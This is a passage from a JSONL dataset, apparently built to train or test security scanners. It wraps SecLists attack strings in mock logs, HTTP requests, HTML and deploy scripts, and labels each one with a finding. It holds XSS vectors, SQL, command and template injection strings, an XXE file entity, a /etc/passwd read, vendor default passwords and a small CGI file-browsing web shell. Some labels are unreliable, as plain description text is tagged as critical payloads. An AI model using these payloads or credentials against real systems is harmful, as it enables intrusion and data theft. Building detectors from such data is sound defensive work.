credentials.txt\nadmin:Terayon,admin,password,", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Terayon,admin,password,"}}]} {"id": "seclists_02308", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:Allied Telesyn,manager,manager,@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Allied Telesyn,manager,manager,"}}]} {"id": "seclists_02309", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: '|echo%20YCIXVI$((40%2B81))$(echo%20YCIXVI)YCIXVI&", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "'|echo%20YCIXVI$((40%2B81))$(echo%20YCIXVI)YCIXVI&", "injection_type": "cmd"}}]} {"id": "seclists_02310", "source": "seclists", "source_license": "MIT", "text": "filename=&ltscript&gtalert(document.cookie);</script>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "&ltscript&gtalert(document.cookie);</script>", "injection_type": "cmd"}}]} {"id": "seclists_02311", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><style>:target {color: red;}</style><tbody id=x style=\"transition:color 10s\" ontransitioncancel=alert(1)></tbody></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<style>:target {color: red;}</style><tbody id=x style=\"transition:color 10s\" ontransitioncancel=alert(1)></tbody>", "injection_type": "XSS"}}]} {"id": "seclists_02312", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf ..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini", "injection_type": "cmd"}}]} {"id": "seclists_02313", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Exploit Tags: general, JS breaking, basic</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Tags: general, JS breaking, basic", "injection_type": "XSS"}}]} {"id": "seclists_02314", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<code draggable=\"true\" ondrag=\"alert(1)\">test</code> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<code draggable=\"true\" ondrag=\"alert(1)\">test</code>", "injection_type": "XSS"}}]} {"id": "seclists_02315", "source": "seclists", "source_license": "MIT", "text": "password: Westell,CSG,SESAME,\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Westell,CSG,SESAME,"}}]} {"id": "seclists_02316", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf ||echo%20CZQCUH$((88%2B14))$(echo%20CZQCUH)CZQCUH%26", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "||echo%20CZQCUH$((88%2B14))$(echo%20CZQCUH)CZQCUH%26", "injection_type": "cmd"}}]} {"id": "seclists_02317", "source": "seclists", "source_license": "MIT", "text": "{% block content %}\n<h1>Hello locals</h1>\n{% endblock %}", "findings": [{"category": "malicious", "subcategory": "malicious.ssti", "severity": "critical", "compliance": [], "fields": {"payload": "locals", "injection_type": "SSTI"}}]} {"id": "seclists_02318", "source": "seclists", "source_license": "MIT", "text": "# credentials.txt\nadmin:radio", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "radio"}}]} {"id": "seclists_02319", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: %2522%7C%20%5B%207%20-ne%20%24%28echo%20JLFVEC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%2522%7C%20%5B%207%20-ne%20%24%28echo%20JLFVEC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//", "injection_type": "cmd"}}]} {"id": "seclists_02320", "source": "seclists", "source_license": "MIT", "text": "<html>\n<body>\n<!--#fsize file=\"ssi.shtml\" -->\n</body>\n</html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<!--#fsize file=\"ssi.shtml\" -->", "injection_type": "SSI"}}]} {"id": "seclists_02321", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Exploit Tags: general, html breaking, CSS breaking\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Tags: general, html breaking, CSS breaking", "injection_type": "XSS"}}]} {"id": "seclists_02322", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><blockquote onkeyup=\"alert(1)\" contenteditable>test</blockquote></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<blockquote onkeyup=\"alert(1)\" contenteditable>test</blockquote>", "injection_type": "XSS"}}]} {"id": "seclists_02323", "source": "seclists", "source_license": "MIT", "text": "username=or ''='&password=admin&submit=Login", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "or ''='", "injection_type": "SQL"}}]} {"id": "seclists_02324", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><head id=x tabindex=1 onactivate=alert(1)></head></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<head id=x tabindex=1 onactivate=alert(1)></head>", "injection_type": "XSS"}}]} {"id": "seclists_02325", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<svg><data onload=alert(1)></data>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<svg><data onload=alert(1)></data>", "injection_type": "XSS"}}]} {"id": "seclists_02326", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Exploit Tags: general, evil tags, obfuscated, style injection, XBL HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Tags: general, evil tags, obfuscated, style injection, XBL", "injection_type": "XSS"}}]} {"id": "seclists_02327", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>Exploit Description: This basic vector breaks HTML titles and injects JavaScript.</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Description: This basic vector breaks HTML titles and injects JavaScript.", "injection_type": "XSS"}}]} {"id": "seclists_02328", "source": "seclists", "source_license": "MIT", "text": "<html>\n<body>\n<!--#echo var=\"server_name -->\n</body>\n</html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<!--#echo var=\"server_name -->", "injection_type": "SSI"}}]} {"id": "seclists_02329", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf a);/usr/bin/id|", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "a);/usr/bin/id|", "injection_type": "cmd"}}]} {"id": "seclists_02330", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<sup onkeydown=\"alert(1)\" contenteditable>test</sup>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<sup onkeydown=\"alert(1)\" contenteditable>test</sup>", "injection_type": "XSS"}}]} {"id": "seclists_02331", "source": "seclists", "source_license": "MIT", "text": "#!/bin/sh\n#\n# SH_KIT\n#\n# list.sh = Directory & File Listing\n#\n# by: The Dark Raver\n# modified: 16/12/2005\n#\n\necho Content-Type: text/html\necho\n\nif [ \"$QUERY_STRING\" != \"\" ]\n then\n echo PATH: $QUERY_STRING \"<br><hr>\"\n echo `ls $QUERY_STRING` > /tmp/test\n else\n echo PATH: / \"<br><hr>\"\n echo > /tmp/test\n QUERY_STRING=\"/\"\n root=\"1\"\n fi\n\nout=`grep \"/\" /tmp/test`\n\nif [ \"$out\" != \"\" ]\n then\n echo FICHERO: $QUERY_STRING\n echo \"<hr><pre>\"\n cat $QUERY_STRING\n else\n if [ \"$root\" != \"1\" ]\n then\n echo \"( ) <a href=?\"$QUERY_STRING\"/..>\"..\"</a><br>\"\n fi\n for i in `ls $QUERY_STRING`\n do\n if [ \"$root\" == \"1\" ] \n then \n echo \"( ) <a href=?/\"$i\">\"$i\"</a><br>\"\n else \n echo \"( ) <a href=?\"$QUERY_STRING\"/\"$i\">\"$i\"</a><br>\"\n fi\n done\n\n fi", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "compliance": [], "fields": {"shell_type": "sh", "filename": "list.sh"}}]} {"id": "seclists_02332", "source": "seclists", "source_license": "MIT", "text": "# Application log\n[2024-01-15 14:22:33] Query executed: SELECT name FROM products WHERE id = ' or true--", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "' or true--", "injection_type": "SQL"}}]} {"id": "seclists_02333", "source": "seclists", "source_license": "MIT", "text": "# Application log\n[2024-01-15 14:22:33] Query executed: SELECT name FROM products WHERE id = admin' or 1=1--", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "admin' or 1=1--", "injection_type": "SQL"}}]} {"id": "seclists_02334", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %0A%20str%3D%24%28echo%20GOUIRV%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%0A%20str%3D%24%28echo%20GOUIRV%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20", "injection_type": "cmd"}}]} {"id": "seclists_02335", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<style>:target {color: red;}</style><object id=x style=\"transition:color 10s\" ontransitioncancel=alert(1)></object> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<style>:target {color: red;}</style><object id=x style=\"transition:color 10s\" ontransitioncancel=alert(1)></object>", "injection_type": "XSS"}}]} {"id": "seclists_02336", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf &#x003c", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "&#x003c", "injection_type": "cmd"}}]} {"id": "seclists_02337", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = '' or 1=1--';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "' or 1=1--", "injection_type": "SQL"}}]} {"id": "seclists_02338", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><x oncontextmenu=alert(1)>right click this!</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<x oncontextmenu=alert(1)>right click this!", "injection_type": "XSS"}}]} {"id": "seclists_02339", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>JavaScript concatenation vector variant 6</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "JavaScript concatenation vector variant 6", "injection_type": "XSS"}}]} {"id": "seclists_02340", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"=\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "=", "injection_type": "XSS"}}]} {"id": "seclists_02341", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><basefont oncontextmenu=\"alert(1)\">test</basefont></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<basefont oncontextmenu=\"alert(1)\">test</basefont>", "injection_type": "XSS"}}]} {"id": "seclists_02342", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"No Closing Script Tag\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "No Closing Script Tag", "injection_type": "XSS"}}]} {"id": "seclists_02343", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>Author Name: ha.ckers.org</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Author Name: ha.ckers.org", "injection_type": "XSS"}}]} {"id": "seclists_02344", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id=0 or 1=1 HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "0 or 1=1", "injection_type": "SQL"}}]} {"id": "seclists_02345", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %0A%20str%3D%24%28echo%20FWGGRQ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%0A%20str%3D%24%28echo%20FWGGRQ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522", "injection_type": "cmd"}}]} {"id": "seclists_02346", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf ;system('cat%20/etc/passwd')", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": ";system('cat%20/etc/passwd')", "injection_type": "cmd"}}]} {"id": "seclists_02347", "source": "seclists", "source_license": "MIT", "text": "filename=a;id;", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "a;id;", "injection_type": "cmd"}}]} {"id": "seclists_02348", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: \" or \"x\"=\"x", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\" or \"x\"=\"x", "injection_type": "cmd"}}]} {"id": "seclists_02349", "source": "seclists", "source_license": "MIT", "text": "<html>\n<body>\n<!--#echo var=\"content_type\" -->\n</body>\n</html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<!--#echo var=\"content_type\" -->", "injection_type": "SSI"}}]} {"id": "seclists_02350", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Exploit Tags: general, evil tags\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Tags: general, evil tags", "injection_type": "XSS"}}]} {"id": "seclists_02351", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf '; exec xp_regread", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "'; exec xp_regread", "injection_type": "cmd"}}]} {"id": "seclists_02352", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"RegExp based, and native C filter vector.\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "RegExp based, and native C filter vector.", "injection_type": "XSS"}}]} {"id": "seclists_02353", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><x onxxx=alert(1) 1='</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<x onxxx=alert(1) 1='", "injection_type": "XSS"}}]} {"id": "seclists_02354", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Exploit Description: This vector uses the __parent__ property to store the alert function and execute it afterwards with new label. HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Description: This vector uses the __parent__ property to store the alert function and execute it afterwards with new label.", "injection_type": "XSS"}}]} {"id": "seclists_02355", "source": "seclists", "source_license": "MIT", "text": "# Application log\n[2024-01-15 14:22:33] Query executed: SELECT name FROM products WHERE id = ) or sleep(__TIME__)='", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": ") or sleep(__TIME__)='", "injection_type": "SQL"}}]} {"id": "seclists_02356", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:sleepy@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "sleepy"}}]} {"id": "seclists_02357", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BJMMJX%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BJMMJX%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C", "injection_type": "cmd"}}]} {"id": "seclists_02358", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>var a = \"</script> <script> alert('XSS !'); </script> <script>\";</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "var a = \"</script> <script> alert('XSS !'); </script> <script>\";", "injection_type": "XSS"}}]} {"id": "seclists_02359", "source": "seclists", "source_license": "MIT", "text": "# Application log\n[2024-01-15 14:22:33] Query executed: SELECT name FROM products WHERE id = %C0%80%27%C0%80%C0%80%C0%80O%C0%82R%C0%80%C0%801%C0%80%C0%A11", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%C0%80%27%C0%80%C0%80%C0%80O%C0%82R%C0%80%C0%801%C0%80%C0%A11", "injection_type": "SQL"}}]} {"id": "seclists_02360", "source": "seclists", "source_license": "MIT", "text": "POST /api/import HTTP/1.1\nContent-Type: application/xml\n\n<name>','')); phpinfo(); exit;/*</name>", "findings": [{"category": "malicious", "subcategory": "malicious.xxe", "severity": "critical", "compliance": [], "fields": {"payload": "<name>','')); phpinfo(); exit;/*</name>", "injection_type": "XXE"}}]} {"id": "seclists_02361", "source": "seclists", "source_license": "MIT", "text": "filename=%20s", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%20s", "injection_type": "cmd"}}]} {"id": "seclists_02362", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<menu id=x contextmenu=x onshow=alert(1)>right click me!\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<menu id=x contextmenu=x onshow=alert(1)>right click me!", "injection_type": "XSS"}}]} {"id": "seclists_02363", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=\"><svg onload=alert(1)// HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\"><svg onload=alert(1)//", "injection_type": "XSS"}}]} {"id": "seclists_02364", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">wtf? Chrome</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "wtf? Chrome", "injection_type": "XSS"}}]} {"id": "seclists_02365", "source": "seclists", "source_license": "MIT", "text": "filename=%0A%20str%3D%24%28echo%20RPJJIB%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%0A%20str%3D%24%28echo%20RPJJIB%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526", "injection_type": "cmd"}}]} {"id": "seclists_02366", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf '|echo$IFSUDMWDN$((49%2B29))$(echo$IFSUDMWDN)UDMWDN%22", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "'|echo$IFSUDMWDN$((49%2B29))$(echo$IFSUDMWDN)UDMWDN%22", "injection_type": "cmd"}}]} {"id": "seclists_02367", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=s/?0[e1+e2+e3+e4]:0,a1=/s/!=/s/?s3[4]:0,a2=/s/!=/s/?s3[5]:0,a3=/s/!=/ HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "s/?0[e1+e2+e3+e4]:0,a1=/s/!=/s/?s3[4]:0,a2=/s/!=/s/?s3[5]:0,a3=/s/!=/", "injection_type": "XSS"}}]} {"id": "seclists_02368", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = 'or 'a'='a';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "or 'a'='a", "injection_type": "SQL"}}]} {"id": "seclists_02369", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf ${passthru(print(`echo%20OVSNXT\\necho%20$((21%2B17))\\necho%20OVSNXT\\necho%20OVSNXT`)%3B%25252529%2525257DOVSNXT", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "${passthru(print(`echo%20OVSNXT\\necho%20$((21%2B17))\\necho%20OVSNXT\\necho%20OVSNXT`)%3B%25252529%2525257DOVSNXT", "injection_type": "cmd"}}]} {"id": "seclists_02370", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Exploit String: <IMG SRC=\"javascript:alert('XSS')\" HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit String: <IMG SRC=\"javascript:alert('XSS')\"", "injection_type": "XSS"}}]} {"id": "seclists_02371", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Exploit Name: Rename .js to .jpg\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Name: Rename .js to .jpg", "injection_type": "XSS"}}]} {"id": "seclists_02372", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<b onmouseleave=\"alert(1)\">test</b>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<b onmouseleave=\"alert(1)\">test</b>", "injection_type": "XSS"}}]} {"id": "seclists_02373", "source": "seclists", "source_license": "MIT", "text": "# Application log\n[2024-01-15 14:22:33] Query executed: SELECT name FROM products WHERE id = \u00e2\u0080\u0098 or 1=1 --", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\u00e2\u0080\u0098 or 1=1 --", "injection_type": "SQL"}}]} {"id": "seclists_02374", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><q id=x tabindex=1 onbeforedeactivate=alert(1)></q><input autofocus></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<q id=x tabindex=1 onbeforedeactivate=alert(1)></q><input autofocus>", "injection_type": "XSS"}}]} {"id": "seclists_02375", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"DIV background-image 1\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "DIV background-image 1", "injection_type": "XSS"}}]} {"id": "seclists_02376", "source": "seclists", "source_license": "MIT", "text": "{% block content %}\n<h1>Hello _self</h1>\n{% endblock %}", "findings": [{"category": "malicious", "subcategory": "malicious.ssti", "severity": "critical", "compliance": [], "fields": {"payload": "_self", "injection_type": "SSTI"}}]} {"id": "seclists_02377", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>JSON based obfuscated onload vector</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "JSON based obfuscated onload vector", "injection_type": "XSS"}}]} {"id": "seclists_02378", "source": "seclists", "source_license": "MIT", "text": "{% block content %}\n<h1>Hello [[${42*42}]]</h1>\n{% endblock %}", "findings": [{"category": "malicious", "subcategory": "malicious.ssti", "severity": "critical", "compliance": [], "fields": {"payload": "[[${42*42}]]", "injection_type": "SSTI"}}]} {"id": "seclists_02379", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)>", "injection_type": "XSS"}}]} {"id": "seclists_02380", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>Exploit Name: IE closing-tag expression injection</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Name: IE closing-tag expression injection", "injection_type": "XSS"}}]} {"id": "seclists_02381", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Exploit Name: RegExp based, and native C filter vector.</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Name: RegExp based, and native C filter vector.", "injection_type": "XSS"}}]} {"id": "seclists_02382", "source": "seclists", "source_license": "MIT", "text": "# credentials.txt\nadmin:Award,<N/A>,j322,", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Award,<N/A>,j322,"}}]} {"id": "seclists_02383", "source": "seclists", "source_license": "MIT", "text": "filename=%0d%0aX-Injection-Header:%20AttackValue", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%0d%0aX-Injection-Header:%20AttackValue", "injection_type": "cmd"}}]} {"id": "seclists_02384", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM \"file:////dev/random\">]><foo>&xxe;</foo> HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM \"file:////dev/random\">]><foo>&xxe;</foo>", "injection_type": "cmd"}}]} {"id": "seclists_02385", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = '3.10E+17';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "3.10E+17", "injection_type": "SQL"}}]} {"id": "seclists_02386", "source": "seclists", "source_license": "MIT", "text": "# credentials.txt\nadmin:Hewlett-Packard,admin,hp.com,", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Hewlett-Packard,admin,hp.com,"}}]} {"id": "seclists_02387", "source": "seclists", "source_license": "MIT", "text": "# credentials.txt\nadmin:Huawei,TMAR#HWMT8007079,<BLANK>,", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Huawei,TMAR#HWMT8007079,<BLANK>,"}}]} {"id": "seclists_02388", "source": 